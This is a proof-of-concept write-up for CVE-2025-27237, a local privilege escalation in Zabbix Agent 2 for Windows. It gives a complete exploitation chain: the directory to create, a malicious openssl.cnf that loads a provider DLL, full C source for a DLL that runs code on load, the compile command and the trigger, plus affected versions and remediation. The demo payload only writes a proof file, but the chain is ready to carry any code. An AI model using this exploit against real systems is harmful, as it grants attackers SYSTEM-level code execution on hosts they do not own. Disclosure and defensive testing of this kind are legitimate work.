# CVE-2025-27237 Proof of Concept

## Overview

This PoC demonstrates local privilege escalation in Zabbix Agent 2 for Windows via OpenSSL configuration file hijacking.

## Vulnerability Summary

| Field | Value |
|-------|-------|
| **CVE** | CVE-2025-27237 |
| **CVSS** | 7.3 (HIGH) |
| **Type** | Local Privilege Escalation / Arbitrary Code Execution |
| **Affected** | Zabbix Agent/Agent2 for Windows 6.0.0-6.0.40, 7.0.0-7.0.17, 7.2.0-7.2.11, 7.4.0-7.4.1 |

## Tested Configuration

- **Binary**: `zabbix_agent2-6.0.39-windows-i386-openssl-static.zip`
- **OpenSSL Version**: 3.4.1
- **Vulnerable Path**: `C:\vcpkg\downloads\tools\msys2\2db36fb050d01f45\etc\ssl\openssl.cnf`

## Prerequisites

1. Local user access to Windows system with Zabbix Agent installed
2. Zabbix Agent configured with TLS (`TLSConnect=cert` or `TLSAccept=cert`)
3. Ability to create directories at `C:\` root (default Windows permissions allow this)

## Exploitation Steps

### Step 1: Create Directory Structure

```cmd
mkdir C:\vcpkg\downloads\tools\msys2\2db36fb050d01f45\etc\ssl
```

### Step 2: Create Malicious openssl.cnf

Create `C:\vcpkg\downloads\tools\msys2\2db36fb050d01f45\etc\ssl\openssl.cnf`:

```ini
openssl_conf = openssl_init

[openssl_init]
providers = provider_sect

[provider_sect]
poc = poc_sect

[poc_sect]
module = C:/vcpkg/downloads/tools/msys2/2db36fb050d01f45/etc/ssl/poc.dll
activate = 1
```

### Step 3: Compile Malicious DLL

Save as `poc.c`:

```c
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        // Write proof file
        HANDLE hFile = CreateFileA("C:\\EXPLOITED.txt",
            GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
        if (hFile != INVALID_HANDLE_VALUE) {
            char buf[512];
            SYSTEMTIME st;
            GetLocalTime(&st);
            int len = wsprintfA(buf,
                "CVE-2025-27237 EXPLOITED!\r\n"
                "Time: %04d-%02d-%02d %02d:%02d:%02d\r\n"
                "Arbitrary code execution achieved!\r\n",
                st.wYear, st.wMonth, st.wDay, st.wHour, st.wMinute, st.wSecond);
            DWORD written;
            WriteFile(hFile, buf, len, &written, NULL);
            CloseHandle(hFile);
        }

        // Optional: Show popup (works in interactive sessions)
        MessageBoxA(NULL,
            "CVE-2025-27237\nCode Execution via OpenSSL Config!",
            "EXPLOITED!",
            MB_OK | MB_ICONWARNING | MB_SETFOREGROUND);
    }
    return TRUE;
}

// Required OpenSSL provider entry point
__declspec(dllexport) int OSSL_provider_init(void *h, void *i, void **o, void **p) {
    return 1;
}
```

Compile with MinGW (32-bit for i386 binary):

```bash
i686-w64-mingw32-gcc -shared -o poc.dll poc.c -luser32 -Wl,--subsystem,windows
```

### Step 4: Deploy DLL

Copy `poc.dll` to:
```
C:\vcpkg\downloads\tools\msys2\2db36fb050d01f45\etc\ssl\poc.dll
```

### Step 5: Trigger Exploit

Wait for Zabbix Agent service restart, or manually trigger:

```cmd
zabbix_agent2.exe -c zabbix_agent2.conf
```

### Step 6: Verify Exploitation

Check for proof file:
```cmd
type C:\EXPLOITED.txt
```

Expected output:
```
CVE-2025-27237 EXPLOITED!
Time: 2026-01-26 11:13:08
Arbitrary code execution achieved!
```

## Zabbix Agent TLS Configuration

The agent must have TLS configured to trigger OpenSSL initialization. Example `zabbix_agent2.conf`:

```ini
Server=127.0.0.1
ServerActive=127.0.0.1
Hostname=TestHost
TLSConnect=cert
TLSAccept=cert
TLSCAFile=C:\path\to\ca.crt
TLSCertFile=C:\path\to\agent.crt
TLSKeyFile=C:\path\to\agent.key
```

## Verification Test

To confirm the vulnerability without code execution:

**Test 1 - Without openssl.cnf:**
```
zabbix_agent2 [xxx]: ERROR: cannot configure encryption: cannot initialize default TLS context: ...no certificate or crl found
```

**Test 2 - With malicious openssl.cnf (provider pointing to non-existent DLL):**
```
zabbix_agent2 [xxx]: ERROR: cannot use encryption configuration: cannot initialize PRNG
```

The change in error message confirms the configuration file was parsed.

## File Listing

After successful exploitation:

```
C:\vcpkg\downloads\tools\msys2\2db36fb050d01f45\etc\ssl\
├── openssl.cnf    (malicious config)
└── poc.dll        (payload DLL)

C:\EXPLOITED.txt   (proof of execution)
```

## Impact

When Zabbix Agent runs as a Windows service (default), it typically runs as `SYSTEM`. A low-privileged user can:

1. Create the vulnerable directory path
2. Plant malicious openssl.cnf and DLL
3. Wait for service restart (or trigger via other means)
4. Achieve code execution as `SYSTEM`

## Remediation

Upgrade to fixed versions:
- 6.0.41+
- 7.0.18+
- 7.2.12+
- 7.4.2+

## References

- [NVD - CVE-2025-27237](https://nvd.nist.gov/vuln/detail/CVE-2025-27237)
- [Zabbix Support - ZBX-27061](https://support.zabbix.com/browse/ZBX-27061)
- [GitHub Advisory - GHSA-r6x3-vwpm-5vwg](https://github.com/advisories/GHSA-r6x3-vwpm-5vwg)

---

*PoC verified on 2026-01-26*
